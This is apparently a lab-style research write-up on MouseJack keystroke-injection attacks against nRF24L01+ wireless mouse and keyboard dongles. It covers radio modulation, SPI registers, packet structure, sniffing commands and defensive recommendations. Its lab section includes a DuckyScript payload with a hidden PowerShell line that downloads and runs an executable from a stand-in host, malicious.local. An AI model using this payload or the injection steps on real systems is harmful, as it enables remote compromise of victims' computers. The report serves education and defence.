MouseJack Attacks and RF Signal Analysis in nRF24L01+ Chips

Human-Interface Device (HID) equipment, such as wireless keyboards, mice, and presenters, often adopt proprietary wireless communication protocols outside of standard Bluetooth to ensure ease of use and efficiency. A vast majority of these devices’ global market share is built upon the nRF24 series (specifically nRF24L01 and nRF24L01+) radio frequency (RF) transceiver chips manufactured by Nordic Semiconductor, which operate in the 2.4 GHz ISM (Industrial, Scientific, and Medical) band and offer extremely low power consumption.

The vulnerability class known in cybersecurity literature as “MouseJack” (including CVE-2016-10761 for various devices) has transformed encryption deficiencies and hardware validation flaws in wireless units using these proprietary protocols into an effective attack vector. The MouseJack vulnerability allows an attacker to inject unauthorized keystrokes into a target computer from up to 100 meters away, potentially leading to a full system compromise within seconds.

LEGAL WARNING AND DISCLAIMER

This report has been conducted and authored in an isolated laboratory environment strictly for the purposes of education, cybersecurity research, and the development of defensive strategies. The reverse engineering techniques, RF signal manipulations, and exploitation methods described herein are documented with the goal of understanding the anatomy of existing hardware security vulnerabilities and developing enterprise-level countermeasures against them.

Testing or utilizing the techniques, tools, and methods contained in this document on unauthorized systems, hardware, third-party networks, or in public spaces is illegal. The author and associated institutions cannot be held responsible for any direct or indirect legal, commercial, physical, or material damages arising from the malicious or unintentional use of the information in this document. All devices targeted during simulations belong to the laboratory inventory, and no third-party data security has been compromised.

TABLE OF CONTENTS

1. General Summary
2. Legal Warning and Disclaimer
3. Technical Terminology
4. 2.4 GHz ISM Band and GFSK Modulation Dynamics
5. nRF24L01+ Transceiver Architecture and SPI Register Map
6. Enhanced ShockBurst (ESB) Protocol and Packet Structure
7. Frequency Hopping Spread Spectrum (FHSS) and Logitech Unifying Protocol
8. MouseJack Vulnerability (CVE-2016-10761) and Exploitation Methods
9. Implementation and Laboratory Activities
10. Evaluation and Solution Recommendations
11. References

GLOSSARY OF TECHNICAL TERMINOLOGY AND ABBREVIATIONS

• AES-128 CCM (Advanced Encryption Standard – Counter with CBC-MAC): An advanced hardware cryptography standard that simultaneously provides data encryption and message integrity validation.
• BadUSB / DuckyScript: Attack hardware recognized by operating systems as a legitimate keyboard that types pre-programmed malicious commands (keystroke injection) into the system within seconds, and the scripting language used by such hardware.
• Dongle: A small transceiver hardware unit, typically plugged into a USB port, that enables RF communication between a computer and wireless peripherals (mouse, keyboard, etc.).
• ESB (Enhanced ShockBurst): A proprietary link-layer protocol developed by Nordic Semiconductor that manages hardware-based automatic packet assembly, CRC validation, and acknowledgement (ACK) mechanisms.
• FHSS (Frequency Hopping Spread Spectrum): A technique where an RF signal is transmitted by rapidly switching among many frequency channels at hundreds of hops per second, according to a pre-determined pseudo-random sequence. It complicates interference and eavesdropping.
• GFSK (Gaussian Frequency-Shift Keying): A type of modulation where the carrier frequency is shifted to transmit digital data, smoothed by a Gaussian filter to narrow the signal transition bandwidth.
• ISM Band (Industrial, Scientific, and Medical Band): A worldwide standardized radio communication band that does not require a license, typically operating at the 2.4 GHz frequency.
• MitM (Man-in-the-Middle): A type of attack where the attacker secretly intercepts the communication between two devices to eavesdrop, manipulate data, or inject rogue packets.
• OTP (One-Time Programmable Memory): A cost-effective type of memory that can be written only once during the manufacturing stage and is closed to subsequent firmware updates.
• Pseudo-Promiscuous Mode: A reverse engineering technique where the hardware filtering features (MAC and CRC) of chips like the nRF24L01+ are manipulated to force the sniffing of RF packets belonging to non-targeted devices.
• RCE (Remote Code Execution): A critical security breach that allows an attacker to execute arbitrary commands or malware on a vulnerable target system, either locally or remotely.
• SDR (Software Defined Radio): Radio frequency systems where radio components typically implemented in hardware (such as mixers, filters, amplifiers, and demodulators) are controlled and processed via software. (e.g., HackRF One).
• SPI (Serial Peripheral Interface): A synchronous serial communication interface specification used for short-distance, high-speed communication between microcontrollers and peripheral sensors like the nRF24L01+.

2.4 GHz ISM Band and GFSK Modulation Dynamics

The vast majority of modern wireless keyboards and mice utilize the ISM band, which covers the license-free frequency range from 2.400 GHz to 2.525 GHz. The nRF24L01+ integrated circuits employ the Gaussian Frequency-Shift Keying (GFSK) modulation technique to convert digital data into analog radio waves.

GFSK is based on the fundamental principles of standard FSK (Frequency-Shift Keying) modulation; in this process, digital “1” and “0” data are represented by creating a specific positive or negative deviation in the carrier frequency. However, unlike standard FSK, GFSK passes the data bits through a Gaussian filter before transmitting them to the Voltage-Controlled Oscillator (VCO).

This filtering process smooths the abrupt frequency transitions caused by the data bits, thereby narrowing the signal bandwidth and minimizing spectral leakage into adjacent channels. This efficiency allows for more robust communication in the crowded 2.4 GHz spectrum.

Figure 1: Sample GFSK Modulation Graph

Mathematically, the operational carrier frequency (f_c​) for the nRF24L01+ is determined by the following formula:

f_c​=2400+RF_CH (MHz)

In this equation, RF_CH is a hardware register representing the RF channel index, which takes a value between 0 and 125. The device’s air data rate can be configured in three different modes: 250 kbps, 1 Mbps, or 2 Mbps.

When operating at a 1 Mbps rate, the channel spacing is set to 1 MHz. However, when operating at 2 Mbps, the channel spacing must be adjusted to 2 MHz to prevent co-channel interference between adjacent channels.

The combination of keeping the modulation index low (a frequency deviation of ±160 kHz for 1 Mbps and ±320 kHz for 2 Mbps) and applying Gaussian filtering ensures that nRF24L01+ modules are less affected by environmental noise generated by other complex protocols sharing the same frequency band, such as Wi-Fi (802.11) and Bluetooth (802.15.1).

However, this relatively simple modulation technique makes it quite easy for the signal to be captured mid-air and demodulated using SDR (Software Defined Radio) devices.

nRF24L01+ Transceiver Architecture and SPI Register Map

Designed by Nordic Semiconductor, the nRF24L01+ is a radio unit featuring a System-on-Chip (SoC)-like architecture. It consists of a fully integrated frequency synthesizer, power amplifier (PA), low-noise amplifier (LNA), crystal oscillator, demodulator, modulator, and a Baseband Protocol Engine (Enhanced ShockBurst™). The chip utilizes a 4-pin hardware SPI (Serial Peripheral Interface) bus with a maximum speed of 10 Mbps to communicate with microcontrollers (MCUs). Its power consumption profile is highly optimized, allowing devices to operate for months on a single battery; it draws 11.3 mA during transmission (TX) at 0 dBm output power and 13.5 mA during 2 Mbps data reception (RX). These values drop significantly to 26 µA in Standby-I mode and a mere 900 nA in Power Down mode.

At the architectural level, the module’s operating modes, status checks, and RF parameters are configured by manipulating specific hardware registers via commands sent over SPI. The table below summarizes the SPI registers and their functions, which are of critical importance for signal analysis and laboratory manipulations:

Register	Address (Hex)	Functional Description and Laboratory Context
CONFIG	0x00	Controls main configurations such as power status (PWR_UP), RX/TX role (PRIM_RX), and the length of the hardware CRC mechanism (EN_CRC, CRCO). For pseudo-promiscuous mode, the CRC is disabled here.
EN_AA	0x01	Enables or disables the Auto-Acknowledgment feature for data pipes. This register is manipulated to force a response from a target device during spoofing or to perform passive sniffing.
SETUP_AW	0x03	Sets the Address Width. Under normal conditions, it can be set to 3, 4, or 5 bytes. Shortening the address field is a critical reverse engineering step for sniffing operations.
RF_CH	0x05	Determines the radio frequency channel (0-125) where the signal will be broadcast or monitored. Frequency hopping algorithms constantly write new values to this register.
RF_SETUP	0x06	Configures the RF air data rate (250kbps, 1Mbps, 2Mbps via RF_DR_LOW/HIGH flags) and RF output power (0, -6, -12, -18 dBm via RF_PWR).
STATUS	0x07	Contains interrupt flags indicating data received (RX_DR), data transmitted successfully (TX_DS), or reaching the maximum retransmission limit (MAX_RT).
RX_ADDR_P0	0x0A	Holds the receiving address for Data Pipe 0. Once an attacker identifies the target device’s MAC address, they impersonate the device by writing that address into this register.

The device also features a MultiCeiver (Multiple Transmitter Single Receiver) architecture, which allows it to listen to six different data pipes simultaneously in a 1:6 star network topology. This specific feature enables a single USB receiver (dongle) to pair with multiple mice or keyboards at once.

While each data pipe has its own unique configuration address, the hardware architecture dictates that the demodulator can only process and move one packet into the FIFO (First-In-First-Out) buffer at any given time.

Figure 2: An Example of Star Network Topology

Enhanced ShockBurst (ESB) Protocol and Packet Structure

The most significant innovation that distinguishes the nRF24L01+ series from previous generations is the Enhanced ShockBurst (ESB) hardware link layer engine. ESB automates packet assembly, validation, automatic acknowledgment (ACK), and automatic retransmission processes at the hardware level, almost entirely eliminating the processing load on the microcontroller (MCU) and reducing bus traffic.

To understand the MouseJack attack at the hardware level, it is essential to examine the strict bit-level sequence of the ESB packet structure. Deciphering raw data sniffed over-the-air relies on the reverse engineering of this structure. A standard ESB packet consists of the following components:

Preamble	1 Byte	Used to synchronize the receiver’s demodulator. It consists of a 10101010 or 01010101 sequence depending on the first bit of the address. This sequence is mimicked in pseudo-promiscuous mode attacks to bypass the hardware filtering shield.
Address	3-5 Bytes	The hardware MAC address that ensures the packet is routed to the correct receiver. Packets that do not match the target address are silently dropped by the ESB engine. The first stage of a MouseJack attack is the identification of this address.
Packet Control (PCF)	9 Bits	The packet control field. It contains 6 bits for Payload Length (specifying data length in Dynamic Payload mode), 2 bits for PID (Packet Identity—to detect retransmissions), and 1 bit for NO_ACK (the no-acknowledgment flag).
Payload	0-32 Bytes	The area where the actual user/application data (mouse coordinates, click information, or keystrokes) is carried. It can be configured as either Dynamic (DPL) or static.
CRC	1-2 Bytes	Cyclic Redundancy Check. A hardware integrity check for the Address, PCF, and Payload fields. It does not provide encryption; it only serves as a transmission error check.

In the context of the MouseJack vulnerability, the hardware receiving an ESB packet and validating the CRC and Address match was sufficient for the firmware inside the USB dongle to accept the packet as a legitimate HID (Human Interface Device) command. Since the encryption layer is handled not within the nRF chip’s hardware but in the firmware layer written by the device manufacturer, the dongle simply assumed it had received a “valid RF packet” and forwarded the data directly to the operating system.

Frequency Hopping Spread Spectrum (FHSS) and Logitech Unifying Protocol

The heavy use of the 2.4 GHz band by Wi-Fi, Bluetooth, microwave ovens, and other IoT devices creates a significant environment of RF interference and noise. To prevent data loss and latency, proprietary protocols like Logitech Unifying utilize Frequency Hopping Spread Spectrum (FHSS) algorithms inspired by military communication standards.

Although the Logitech Unifying protocol is built upon the nRF-based ESB packet structure, it prevents devices from remaining on a static channel for long periods. The algorithm continuously changes the carrier frequency (hop rate) across a pre-determined pseudo-random frequency table at specific time intervals. These transitions, synchronized with microsecond precision between the transmitter and receiver, occur during a specific “Dwell Time” (the duration spent on a single frequency) and allow for the bypassing of noisy channels.

This mechanism serves as the primary defense making it difficult to monitor communications with SDR (Software Defined Radio) devices or sniffing nRF modules. The time window required for the receiver (USB dongle) to return an acknowledgment (ACK) upon receiving a packet from a mouse or keyboard—and for the transmitter to detect packet loss—is limited by hardware to an extremely narrow window, such as 250 microseconds.

Traditional SDR-based decoders (e.g., USRP or HackRF) cannot retune the channel and generate a rogue ACK packet within this 250-microsecond window due to the processing latency created by computer-based GNU Radio software over USB and operating system overhead. Consequently, for practical and reliable MouseJack exploitations, hardware also based on nRF24L or nRF24LU1+ (such as Crazyradio PA or Flipper Zero GPIO modules) is used instead of computer-based SDRs to manipulate signals in real-time.

MouseJack Vulnerability (CVE-2016-10761) and Exploitation Methods

The root cause of the MouseJack vulnerability class lies in a fundamental asymmetry in wireless security: while data transmitted by wireless keyboards is typically encrypted using AES (or similar proprietary algorithms), hardware movement (X-Y coordinate shifts) and click data from wireless mice are often transmitted over-the-air as entirely unencrypted plaintext. When the USB dongle processes an incoming packet via the nRF24L01+ integrated circuit, it cannot inherently distinguish at the hardware level whether a packet should be encrypted or not. Instead, the dongle’s firmware, which receives the packet over SPI, is responsible for isolating and distinguishing between unencrypted “mouse” packets and encrypted “keyboard” packets.

The critical failure point occurs during this validation stage: many manufacturers’ USB dongles do not verify whether the HID commands contained within a packet match the device type that sent it. Under normal conditions, a paired mouse should only transmit “movement” or “click” payloads. However, if an attacker learns the target mouse’s MAC address (via sniffing) and spoofs it, they can craft a packet formatted as an “unencrypted mouse packet” but embed keyboard keystroke data instead of movement data. Because the packet is unencrypted (matching the expected format for a mouse), the dongle firmware fails to detect the anomaly, decrypts nothing, and forwards the data directly to the computer’s USB port. The operating system then accepts this data through the USB HID (Human Interface Device) class drivers as legitimate keyboard input, executing the keystrokes on the victim’s screen.

In laboratory tests and technical bulletins published by Bastille researchers, it has been recorded that an attacker’s keystroke injection speed can reach hundreds of strokes per second (approximately one character every 8 ms, or 7,500 keystrokes per minute). In literature, the MouseJack vulnerability is classified under three main exploitation types:

–Keystroke Injection via Mouse Spoofing: As explained above, this involves the lack of device-type validation and the embedding of keyboard commands within unencrypted mouse packets.

–Keystroke Injection via Keyboard Spoofing: A situation where some dongles—despite the keyboard’s capability to encrypt—continue to accept unencrypted packets from keyboards, effectively allowing a “downgrade attack.” In this scenario, the attacker acts as a fake keyboard and sends unencrypted text directly.

–Forced Pairing: Devices normally recognize each other at the factory or during pairing modes that remain active for a limited time (30–60 seconds). Some dongles possess vulnerabilities in these timeouts or physical button requirements. An attacker can remotely bypass the pairing mode and register a malicious, unencrypted keyboard to the dongle without the user’s consent.

Implementation and Laboratory Activities

The first step in monitoring nRF24L01+-based wireless communication is to make the invisible target frequency spectrum visible and analyzable. For this purpose, the HackRF One, an advanced half-duplex SDR platform operating between 1 MHz and 6 GHz, was utilized. The HackRF One is capable of transferring a maximum instantaneous bandwidth of 20 MHz to a computer at a sampling rate of 20 million samples per second (20 MSPS). However, considering the 125 MHz total width of the 2.4 GHz band, standard 20 MHz static windows are insufficient for capturing the hopping sequences of signals that change channels (FHSS) hundreds of times per second.

To monitor nRF24L01+-based wireless communication, the HackRF One SDR platform and the hackrf_sweep tool were employed.

Note: The codes used in this report were written for Linux-based terminals. If you are using Windows or macOS, please be aware that these codes may not function as intended.

hackrf_sweep -f 2400:2525 -w 1000000 -a 1 -l 24 -g 24

• -f 2400:2525: Limits the scan to the relevant ISM band.
• -w 1000000: Sets a 1 MHz resolution to match the 1 Mbps nRF bandwidth.
• -a 1, -l 24, -g 24: Activates the RX LNA and optimizes the IF and VGA gains.

Figure 3: Frequency hops demonstrating the target device’s FHSS behavior in the 2.4 GHz spectrum.

To overcome the processing latencies inherent in GNU Radio, microcontroller-based nRF modules were configured in “Pseudo-Promiscuous Mode.” In this mode, ESB features are disabled, the address matching length is reduced, and hardware CRC is deactivated, allowing the target’s unencrypted MAC address to be identified within seconds.

Terminal Command:
sudo ./tools/nrf24-scanner.py -c {2..74..3} -l

The identified MAC address was then assigned to a Flipper Zero device connected to an nRF24L01+ module via GPIO pins.

The sample DuckyScript (BadUSB) payload prepared for the simulation:
DELAY 1000
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
STRING powershell.exe -w hidden -c “Invoke-WebRequest -Uri ‘http://malicious.local/payload.exe’ -OutFile ‘C:\Windows\Temp\p.exe’; Start-Process ‘C:\Windows\Temp\p.exe'”
ENTER

This payload was transmitted over RF to the victim’s dongle, successfully simulating RCE (Remote Code Execution) on the system.

Evaluation and Solution Recommendations
In conclusion, MouseJack attacks are significant threats that can lead to severe consequences and should not be underestimated. Defensive measures can be examined under the following three categories:

1. Hardware and Firmware Updates

Devices must be updated to patched versions using DFU (Device Firmware Update) images via Logi Options+ (Windows) or fwupdmgr (Linux). However, for low-cost hardware equipped with OTP (One-Time Programmable) memory, physical destruction and replacement of the unit is the only viable solution.

2. Cryptographic Countermeasures

Hardware encryption using the AES-128 CCM (Counter with CBC-MAC) standard should be mandated not only for keyboards but for mice as well. When procuring new generation devices, “AES-128 encryption support” and “Updatable Firmware” should be added to the technical specifications.

3. SOC and Threat Detection

SDR hardware should be integrated into WIDS/WIPS (Wireless Intrusion Detection/Prevention Systems) infrastructures to monitor FHSS anomalies in the 2.4 GHz band. Additionally, rules should be added to EDR (Endpoint Detection and Response) agents to block unusual HID behaviors, such as thousands of keystrokes per second.

Eyüp Efe Aslan

REFERENCES

mousejack.comAbout — MouseJack
helpnetsecurity.comMouseJack: Remote exploitation via radio frequencies – Help Net Security
scworld.comUPDATE: Wireless mice and keyboards vulnerable to MouseJack takeover – SC Media
sra.ioMouseJack
nicerf.comnRF24L01/nRF24L01+ module principle introduction – NiceRF
elechouse.comNRF24L01.pdf – elechouse
crowe.com/insights/crowe-cyber-watch/wireless-peripheral-hijacking-mousejack-attacks-explained-dgs